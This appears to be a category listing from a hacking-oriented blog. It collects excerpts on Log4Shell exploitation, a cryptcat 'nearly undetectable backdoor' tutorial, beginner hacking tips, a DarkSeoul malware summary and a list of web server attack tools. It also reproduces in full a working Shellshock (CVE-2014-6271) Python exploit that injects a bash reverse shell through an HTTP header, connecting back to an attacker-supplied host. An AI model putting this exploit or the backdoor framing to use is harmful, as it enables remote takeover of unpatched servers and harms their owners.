Browsing Category
Black Hats are actively weaponizing unpatched servers affected by the newly identified “Log4Shell” vulnerability in Log4j to install cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet, even as telemetry signs point to exploitation of the flaw nine …
In this tutorial, I’ll introduce you to netcat’s popular cousin, cryptcat (she’s actually much cuter and more exotic than the plain netcat). Cryptcatenables us to communicate between two systems and encrypts the communication between them with twofish, one of many …
Continue reading How to Create a Nearly Undetectable Backdoor with Cryptcat
Computer viruses are rapidly growing in the World Wide Web as numerous hackers unleash them on internet in the hope of stealing private financial information. To protect yourself completely, it is important to have a set of tools hardware and …
First and foremost, it is important for you to understand that ‘hacking’ is a broad term. There are many aspects to it, most of which require several programming skills, but that shouldn’t stop you from using the tools made available by the internet for you to take advantage of. Go to the HTMLdog website and learn some HTML first, it is a great website and you will progress in no time. Also, consider Python as your first programming language; it is a tradition to recommend Python to newbies because it is the fundamental and appropriate language that will kickstart you …
Executive Summary Reporting and technical details surrounding the malware used in the March 20, 2013, attack on South Korean assets have been varied and inconsistent. However, there are some commonalitie reported across multiple organizations that provide some level of insight into the malware, dubbed DarkSeoul. The common attributes of the attack campaign are the following: •The malicious file wipes the master boot record (MBR) and other files. •The malware was hard coded with a specific execution date and time and searches machines for credentials with administrative/root access to servers. •The malware is written to specifically target South Korean victims. …
# #CVE-2014-6271 cgi-bin reverse shell # import httplib,urllib,sys if (len(sys.argv)<4): print “Usage: %s <host> <vulnerable CGI> <attackhost/IP>” % sys.argv[0] print “Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080” % sys.argv[0] exit(0) conn = httplib.HTTPConnection(sys.argv[1]) reverse_shell=“() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1” % sys.argv[3] headers = {“Content-type”: “application/x-www-form-urlencoded”, “test”:reverse_shell } conn.request(“GET”,sys.argv[2],headers=headers) res = conn.getresponse() print res.status, res.reason data = res.read() print data
Continue reading Check vulnerable reverse shell CGI (shellshock)
Some of the common web server attack tools include; Metasploit– this is an open source tool for developing, testing and using exploit code. It can be used to discover vulnerabilities in web servers and write exploits that can be used to compromise the server. MPack– this is a web exploitation tool. It was written in PHP and is backed by MySQL as the database engine. Once a web server has been compromised using MPack, all traffic to it is redirected to malicious download websites. Zeus– this tool can be used to turn a compromised computer into a bot or zombie. …
